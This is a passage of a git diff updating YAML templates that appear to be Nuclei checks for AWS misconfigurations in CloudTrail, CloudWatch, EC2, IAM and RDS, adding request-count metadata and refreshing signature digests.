cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - - variables: region: "ap-south-1" @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to capture management operations performed on your AWS cloud resources"' -# digest: 4a0a00473045022071c61afb61f0c431e2f7edf10563f582ede9a3a52e70a847ac8c6423758f5777022100e921cca38de3640c42ba86369837d9015c0b7b371c218eac3281f789392f77bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0879bcbe45c9ed0c8921338f6384c009e9a4e2b4e9b8199e3b462fcb93ca7bb02202ba77a0927be3707abc226f4b5d0c4116cd8f2b4d463e8f822e8defbe7934e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml index 6a8584340e..2e00ce9ce7 100644 --- a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml @@ -11,8 +11,9 @@ info: Restrict S3 bucket access using bucket policies or IAM policies to ensure that CloudTrail logs are not publicly accessible. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' -# digest: 4a0a00473045022039127acbaf7f578247fb47cdfe1a2fdd2a67e57bca815a7786011743df98451c022100c8e1b247da863d14ae8ba023a1f7d05ea77faf28cc1d1c4eb5752c0976d54b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220153c8058c6e3274fd6caf2b309baa876492c64fa5978590b21938000e9416aa6022100faaf8886e0deb971d17b2f325fc402814e59ce66ff16ea343543e3b6b3f13773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml index ef93d42d16..673958d64a 100644 --- a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml @@ -11,8 +11,9 @@ info: Enable Server Access Logging on the S3 bucket used by CloudTrail. Configure the logging feature to capture all requests made to the CloudTrail bucket. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" @@ -70,4 +71,4 @@ code: - type: dsl dsl: - '"Access logging is not enabled for the S3 bucket associated with CloudTrail trail " + trail' -# digest: 4a0a00473045022100fc881c1ddc9a2e0229e8f3fbac211a1e5c3b7dac4363cd0611c002a55f455dc602201c3c0d885e1b03e7c10a09dbe42871bd2eeb1ffb62360ece9e5297a0d07e6953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfe94b20d18063458c694381cd23f96dd8023473e8b9e8151922295b88bff033022044b9f7a79baa2caa0d4ae5406a2701c73c77ddc43da72190b32f1e6ec1fa21ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml index eea6307c9b..6f4296da9d 100644 --- a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml +++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml @@ -11,8 +11,9 @@ info: Enable S3 Object Lock in Governance mode with a retention period that meets your compliance requirements for CloudTrail S3 buckets. reference: - https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" @@ -71,4 +72,4 @@ code: - type: dsl dsl: - '"The Object Lock feature is not enabled for the S3 bucket associated with the CloudTrail trail " + trail' -# digest: 4b0a00483046022100cdae2dc4719a039aae0873a5c1a1b4f5797593a1f555ee93a6752d408a181ebd022100f0decf46ad9b338bbcd2ea531acf088dcb76a0e605d9d7032130351113b92b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adf9327a943f74cada1c893502adad96b8db198c24c0211486944503bc818dc202205d41291ad41820b5afe0d7d1eb4061acde307124ff04b588b1cb3fbeec75f54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml index 5d5a969bd9..ee2b45093d 100644 --- a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml +++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml @@ -11,8 +11,9 @@ info: Configure at least one action for each CloudWatch alarm to ensure timely response to monitored issues. reference: - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"The Amazon CloudWatch " + alarm +" is not configured with any actions for the ALARM state."' -# digest: 4a0a004730450220699edd21da9a908d8160230a38300e78c76cce31988d83565ed8b7a0c9b41d70022100c607f34933362074e992f81390dae32347f888ffa68a9d97aac8aad03a388f55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3558add899cfc87cef41ebadd1b931c1250bf0f7255e53a67e1aa663b37925b02204010a3c40e8a0ad49ac62d537bcf1a2e4da4d59b40ebc78d5c56e03d1f89348d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml index d3d3bf23e9..b228c92c48 100644 --- a/cloud/aws/cloudwatch/cw-alarms-actions.yaml +++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml @@ -11,8 +11,9 @@ info: Enable actions for each CloudWatch alarm by setting the ActionEnabled parameter to true, allowing for automated responses to alarms. reference: - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"The Amazon CloudWatch " + alarm + " does not have any active actions configured"' -# digest: 4b0a00483046022100c25b4a5bed3d8e28421708a03ab05c2b09f619f6c38472a34377d2db18e4d730022100d057819cf7fbf55503e3a93b82daa4b438fb204056422e34bbcb5a6ddb4d425e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f22697b5c7a4b568fa37b48600e0f99f469922bdd208491966d4eef4fd6355d02204f33504b85a9de2df430dde270e0f481760be59ca0340bb93c245143558b0444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml index d10f792c17..802e36a5c5 100644 --- a/cloud/aws/ec2/ec2-imdsv2.yaml +++ b/cloud/aws/ec2/ec2-imdsv2.yaml @@ -11,9 +11,9 @@ info: Modify the EC2 instance metadata options to set `HttpTokens` to `required`, enforcing the use of IMDSv2. This can be done via the AWS Management Console, CLI, or EC2 API. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - - variables: region: "us-east-1" @@ -53,4 +53,4 @@ code: - type: dsl dsl: - 'ami + " is publically shared"' -# digest: 4b0a00483046022100a9c93182cc816c3d5bc33cf11b0b8fa7f667153ee8f1c742c1c50da21309f666022100eec3b3b58d54dc9609e9b3b5cbe5feefd239ed07c12958cf75456d961aa3258a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014b5f386ded068e3ca4990545da3f49124b5e48e86bea8ea94a380c367e3aeb9022100ed0ecb915d4c1b7be7a7906ffa2a55a2988669e3418301b6886a45df6a57b337:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml index 97edc1e31d..5243b53fb9 100644 --- a/cloud/aws/ec2/ec2-public-ip.yaml +++ b/cloud/aws/ec2/ec2-public-ip.yaml @@ -11,8 +11,9 @@ info: Restrict public IP assignment for EC2 instances, particularly for backend instances. Use private IPs and manage access via AWS VPC and security groups. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"The Amazon Instance " + ec2instance + " uses public IP addresses"' -# digest: 4a0a00473045022100f1dcc6e7fab82b9688102b0f02fddc8c9930007bc885800ac26e4e5ea412ed670220667fdf2d67ebff9d4346a853856402dbd78197c727feae253e6629f53de0f957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6d48dea82c4b3c88a81c6060dbedadb56502f1d2b692dd7d309e67b7d20504602203063ae7dcaa055dc54d9d6f0f534a96feb3966280b2a9004201fc21fe7752964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml index 77bbec7c2d..8d7f92805c 100644 --- a/cloud/aws/ec2/ec2-sg-egress-open.yaml +++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml @@ -11,8 +11,9 @@ info: Restrict egress traffic in EC2 security groups to only necessary IP addresses and ranges, adhering to the Principle of Least Privilege. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html#sg-rules + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" @@ -54,4 +55,4 @@ code: - type: dsl dsl: - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted outbound traffic"' -# digest: 490a0046304402200e8c75db5d5e8809d4e97173605a8d845e49d80bd788de5a7ba6cefc77f9110202200e57d1342300e4858c189e8dd15e8084cbf17f2f75ab3f8fbe8134979f4a6bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020d4b03ec7e884a6a9516b16ab27112d3d1e307bdd145875d8a47c5f85e8c5dd022100c3bcec6be21508dcf10fe542df392d777029d8f8658479f1690c7d38f234f7fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml index 5734057e9b..8acf92da3a 100644 --- a/cloud/aws/ec2/ec2-sg-ingress.yaml +++ b/cloud/aws/ec2/ec2-sg-ingress.yaml @@ -11,8 +11,9 @@ info: Restrict access to uncommon ports in EC2 security groups, permitting only necessary traffic and implementing stringent access controls. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" @@ -54,4 +55,4 @@ code: - type: dsl dsl: - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted inbound traffic"' -# digest: 4b0a004830460221009b9e3e94679739de1a688c3b15bc4f592472272245df9bfbc675211eeaa6f45602210097597c2bae7f04a1d2440e25e37986679daa91e6e8fe277cb1fb99874d2e5fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100881b4639e87b866a26e2397b65cebda755a3e870faa83f93122314e58a111837022100bf8b00a4e7ac9fc0f71faf6314470a221c9a95af8b3590c7076267d4badd9592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml index f371872c2f..4116d4e60a 100644 --- a/cloud/aws/ec2/publicly-shared-ami.yaml +++ b/cloud/aws/ec2/publicly-shared-ami.yaml @@ -11,8 +11,9 @@ info: Restrict AMI sharing to specific, trusted AWS accounts and ensure they are not publicly accessible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ami,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - 'ami + " AMI is publically shared"' -# digest: 4a0a004730450220193e6725ccb97bbd7071e4dad36601e0e8625dd4901a653eacf3141faf6e8a82022100d7d61c14183f4a6563ac749634aa9af5e01332d52583cba6e703cf4958bbe63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202170a728aa9a257c4f5c57f8cbe604df3b4288eb8d54deeaf7e1c8961e392c4d022100c0f6fffcdfbf887cdf6b0bf253f5d468b33670e054ff2669b3dc4c2245560595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml index 07452176fe..84204c750c 100644 --- a/cloud/aws/ec2/unencrypted-aws-ami.yaml +++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml @@ -11,8 +11,9 @@ info: Encrypt your AMIs using AWS managed keys or customer-managed keys in the AWS Key Management Service (KMS) to ensure data security. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIEncryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - 'ami + " AMI is not encrypted"' -# digest: 4a0a00473045022100a7b00e475c508994eab83d044d65086d511d0dcdde83abed644133c35775d4a402203ff217b94895c174e5d6036a27c3cedba4e74cc0b2a4fb957b71390c2d7454eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006b2a8f1493aca05a5bbb6dd85e177cfacec3cf7e380e0bdd32179719555a881022100f893098f309383eacc3b8fff8a3394101a3bd39897babe77b4ac0911555498ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml index e48897a0c8..cc46579707 100644 --- a/cloud/aws/iam/iam-full-admin-privileges.yaml +++ b/cloud/aws/iam/iam-full-admin-privileges.yaml @@ -7,6 +7,8 @@ info: Verifies that no Amazon IAM policies grant full administrative privileges, ensuring adherence to the Principle of Least Privilege reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy-version.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | @@ -49,4 +51,4 @@ code: - type: dsl dsl: - '"The IAM policy " + policy +" is Overly Permissive"' -# digest: 4a0a0047304502203eeeb24dbf1cfd3f41550e0c0b66bfb9ba23ea9912139aa2385e48b3a668d336022100dcb4c90fbb816ab247ea9d506497b900640b3d052bb2ce2b2f8b9a9e7fe58d9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bc9f722616e4216ee5bccead511cb6086d4f998014314d8a8478ec44f424f40022029c5288eda6b59b7217a8836cb5d506e7b7ad234f6272fe94570815dc7b0d0a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml index e8525012ee..179672de2c 100644 --- a/cloud/aws/iam/iam-key-rotation-90days.yaml +++ b/cloud/aws/iam/iam-key-rotation-90days.yaml @@ -7,6 +7,8 @@ info: Checks if IAM user access keys are rotated every 90 days to minimize accidental exposures and unauthorized access risks reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-access-keys.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | @@ -47,4 +49,4 @@ code: - type: dsl dsl: - '"The IAM Key " + accesskey +" is older than 90 days"' -# digest: 4a0a00473045022100d15b76ce838fa09da565afb9414204e3a5bc5487d1cca1ea4fb3560c339ac6f60220291edc1503af6dfa14709487d50d0eff776aafaaf1d07580cc1199ea21fb48ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a9b12e596c433a426976cc985f93e87eb624f05932b7e78a72dd633496726fa022100db223fbc664946a1d52e6916fa64fb18bb07efcb40ddba5110bb24c8a29d932b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml index 5d649f479c..07bde276ca 100644 --- a/cloud/aws/iam/iam-mfa-enable.yaml +++ b/cloud/aws/iam/iam-mfa-enable.yaml @@ -7,6 +7,8 @@ info: Verifies that Multi-Factor Authentication (MFA) is enabled for all IAM users with console access in AWS reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-mfa-devices.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | @@ -46,4 +48,4 @@ code: - type: dsl dsl: - '"MFA is no enabled for IAM User " + user' -# digest: 4a0a00473045022100f326cf9a9fdd5f737d1126dd4938a233059a58f816e7e75a9a0bbab2f9a5d8230220219f4277870b52c124be28db9d8adfe6b88d2ea8b1570756a3f7772384887eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008072a04e0f68ee2345d1bfeee304675bc22468a061fd9fa3fbed31279e399640022057efc7bfe58fc41c86be4cfdc0870e4d998282ff71b6d70a3da557cb67cd2d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml index ca9e3a8066..bc889ba423 100644 --- a/cloud/aws/iam/iam-ssh-keys-rotation.yaml +++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml @@ -7,6 +7,8 @@ info: Verifies that IAM SSH public keys are rotated every 90 days, enhancing security and preventing unauthorized access to AWS CodeCommit repositories reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-ssh-public-keys.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,ssh,aws-cloud-config flow: | @@ -47,4 +49,4 @@ code: - type: dsl dsl: - '"The SSH Public Key " + accesskey +" is older than 90 days"' -# digest: 490a00463044022017e707c66f9a058bd875e7a516d99585a1be526405545647011958874bd784a702201259fdf89b05b2fa171d789e014fe98d7949010ff420be02f0ef7183565544ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200df47806e0ebcba6e0cbd3e933b7db44c7e85cb3e43bbb634ee48521d2c441e7022100b0694e5404356f0219d841a6ec17f3d756542a0c4137973b21d45dec07f12e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml index bfefd94533..2cc98774d5 100644 --- a/cloud/aws/rds/aurora-copy-tags-snap.yaml +++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml @@ -11,8 +11,9 @@ info: Enable Copy Tags to Snapshots for Aurora clusters via the AWS Management Console or modify the DB cluster to include this feature using AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_Tagging.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"Copy Tags To Snapshot is not enable for cluster " + cluster' -# digest: 490a00463044022017828b27f24bd205df0e6c14c80b4cae52d2f6366dde8c60cc58302d7ca9c8ba022062233631583c3e674bb1daebdb9375c3501900fb1ba9ed7a06d972f8b7265b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc4ba9d64dbc0cb8bfebf677ff5b05c1eae8736bf8e64544dd8d0fc9b6daa762022100fd690deaf7ba10c756be945828cd76f7a03eb4442aeadf3c2cadf5bdb6f995c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml index c7ae76d4fb..1dd4462220 100644 --- a/cloud/aws/rds/aurora-delete-protect.yaml +++ b/cloud/aws/rds/aurora-delete-protect.yaml @@ -11,8 +11,9 @@ info: Enable Deletion Protection by modifying the Aurora cluster settings in the AWS Management Console or via the AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/DBInstanceDeletionProtection.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"Deletion Protection safety feature is not enabled for " + cluster' -# digest: 4b0a00483046022100c1c1ed75c7401266f13e1fc388a357df843c7994ab44ae8f501b14842ab7ec24022100b6c077b49006fb9ca13885abddf6be9c787d64eb415a13972e5fa3ea637792f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203957dae25c011794e69952e0a2122ce835294c72217b3dab63dfb30cec9fb36a02200bcd6f0ed9487a240393aebd0937196c729d98ecf8a3c86cb65a854534da925c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml index c76c5618b5..9acab1201f 100644 --- a/cloud/aws/rds/iam-db-auth.yaml +++ b/cloud/aws/rds/iam-db-auth.yaml @@ -11,8 +11,9 @@ info: Enable IAM Database Authentication for MySQL and PostgreSQL RDS database instances to leverage IAM for secure, token-based access control. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"Database Authentication feature is not enabled for RDS database instance " + db' -# digest: 4a0a00473045022100de421600413f2bb3306a9173334cd465c628dd5a198cec9ebe3bf5a373b4479602200bd9a29ac4bc3efe52763411a53243855f599f703baa22c7292da16898754f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c13b8d1e92988ff64fb71594f77d83105a2c8381fb5de3a284e41ee9b5c707940220585d60f323e31b9bc5ad2c72b045b1645c4a1546555f29c1ffb99936519dea83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml index 4a61f55d05..96616abe69 100644 --- a/cloud/aws/rds/rds-backup-enable.yaml +++ b/cloud/aws/rds/rds-backup-enable.yaml @@ -11,8 +11,9 @@ info: Enable automated backups for RDS instances by setting the backup retention period to a value other than 0. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"Automated backups are not enabled for " + db + " RDS database instance"' -# digest: 490a0046304402202cafc27efb26d112eaeeda54182636abc27e1c7d4c685250eee139e6016ad0e00220696ff967f5e74543e24b1f563a48870e20c7a651ebf098221cb3aa53d92d0a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100886ff717bb53ef7b235b73d9d22a861dee9a08a2c196289d611085a7e0418faa02200ad55fc97ce71f4828dc428a743be339174c1fdd6b0e68b4501e0ef6acf6b9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml index 9e3cf32f15..0fc7269620 100644 --- a/cloud/aws/rds/rds-deletion-protection.yaml +++ b/cloud/aws/rds/rds-deletion-protection.yaml @@ -11,9 +11,9 @@ info: Enable Deletion Protection for all Amazon RDS instances via the AWS Management Console or using the AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - - variables: region: "ap-northeast-1" @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"RDS Deletion protection feature is not enabled for RDS database instance " + db' -# digest: 4b0a00483046022100914032dbc9479e0c23f03d553ff358b24dbb159d2b0e39591c929e1b7392f357022100dd0d109579a0dba307e0e203996af0754cc7d40cf1ef7adb218b01cba7fae2a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038daa8448190d837886c059bdc5c6ac4e48af03bf77572125c2465420d62224a02206ee2419a639762e33d52f890714e4e1dcb9aac3b10882d8accbdfc4e3324d67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml index 0738c976ec..2193fd2490 100644 --- a/cloud/aws/rds/rds-encryption-check.yaml +++ b/cloud/aws/rds/rds-encryption-check.yaml @@ -11,8 +11,9 @@ info: Enable encryption for your Amazon RDS instances by modifying the instance and setting the "Storage Encrypted" option to true. For new instances, enable encryption within the launch wizard. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"The encryption of data at rest is not enabled for " + db + " RDS database instance"' -# digest: 4a0a00473045022057333f0cba59e048aec18908bd8cbda6a4ab5398581190a3602a82d1f7f63f140221008c6002f40daa4eef203c0be542377e675dd0b28d3595fa4664449f30f13f325d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022013a493868c5989511d93d8702f49b30f995463ea94c0e0b9bfc859864b301cf3022100e40eecfced944d0776dcc8cc0f6b762902df7fcffc45e727b3a6a2b25630cf79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml index f352ac58ab..cfe4b9f258 100644 --- a/cloud/aws/rds/rds-gp-ssd-usage.yaml +++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml @@ -11,8 +11,9 @@ info: Convert RDS instances from Provisioned IOPS to General Purpose SSDs to optimize costs without sacrificing I/O performance for most database workloads. reference: - https://aws.amazon.com/rds/features/storage/ + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - 'db + " RDS instance uses Provisioned IOPS SSD, not the most cost-effective storage"' -# digest: 4a0a00473045022002f5c7fdd4d9d80a6820cfc1f222bfed3a1d9ad2e9f25cd1ef7757d60774a7dc022100c202e64f627d1aadd2a131aecdc048917a11798572597b382064897ed0848d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204abe02c1e1c465599d29b1e4d649d7076822a9529f8bd82e2005335f88b3e19402203cfedc9da10ff590c6b8dd01917ebce8b1c58c4c78f6af76e826b94d5aaa50e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml index 6e067db633..e5a7aa9a50 100644 --- a/cloud/aws/rds/rds-public-snapshot.yaml +++ b/cloud/aws/rds/rds-public-snapshot.yaml @@ -11,8 +11,9 @@ info: Modify the snapshot's visibility settings to ensure it is not public, only shared with specific AWS accounts. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -53,4 +54,4 @@ code: - type: dsl dsl: - '"RDS snapshot " + snapshot + " is public"' -# digest: 4a0a0047304502210081a28e626fa15113ec4728cae1cd78218b292f7c71adc72cdb0b6d957475955302207063c6eda8c853ca2b1041f2751246979a75381a89e64b262b679667da1eb1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220406064aac939d4deee904e965a39e74b5b6a866aa0120dc7a3ac03683a464fcb02204c1c229f967d74c64b9b3ebc03c6d31678f471305d10f708528996202549111f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml index 7937f55c6b..7dbe3e5a5a 100644 --- a/cloud/aws/rds/rds-public-subnet.yaml +++ b/cloud/aws/rds/rds-public-subnet.yaml @@ -11,8 +11,9 @@ info: Migrate RDS instances to private subnets within the VPC and ensure proper network ACLs and security group settings are in place to restrict access. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_VPC.WorkingWithRDSInstanceinaVPC.html#USER_VPC.Subnets + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" @@ -71,4 +72,4 @@ code: - type: dsl dsl: - 'db + " RDS instance is setup within a public subnet"' -# digest: 